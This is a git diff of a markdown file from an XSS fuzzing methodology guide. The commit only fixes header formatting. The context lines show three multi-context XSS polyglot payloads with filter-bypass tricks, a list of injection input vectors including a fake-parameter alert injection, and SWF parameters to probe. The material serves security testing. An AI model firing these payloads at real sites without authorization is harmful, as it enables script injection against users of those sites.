jhaddix · 0xdevalias · Sep 12, 2017
diff --git a/05_XSS.md b/05_XSS.md
@@ -1,30 +1,30 @@
-#Tactical Fuzzing - XSS
+# Tactical Fuzzing - XSS
 
 ## XSS
 Core Idea: Does the page functionality display something to the users?
 For time sensitive testing the 80/20 rule applies. Many testers use Polyglot payloads. You probably have too!
 
-###*Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)
+### Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)
 
 ``
 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
 ``
 
 
 
-###Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)
+### Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)
 
 ``
  ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
 ``
 
-###Multi-context polyglot payload (Mathias Karlsson)
+### Multi-context polyglot payload (Mathias Karlsson)
 
 ``
 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
 ``
 
-##Other XSS Observations
+## Other XSS Observations
 
 Input Vectors:
 - Customizable Themes & Profiles via CSS
@@ -38,7 +38,7 @@ Input Vectors:
 - fake params - ?realparam=1&foo=bar’+alert(/XSS/)+’
 - Login and Forgot password forms
 
-##SWF Parameter XSS
+## SWF Parameter XSS
 
 Common Params:
 onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on OWASP page)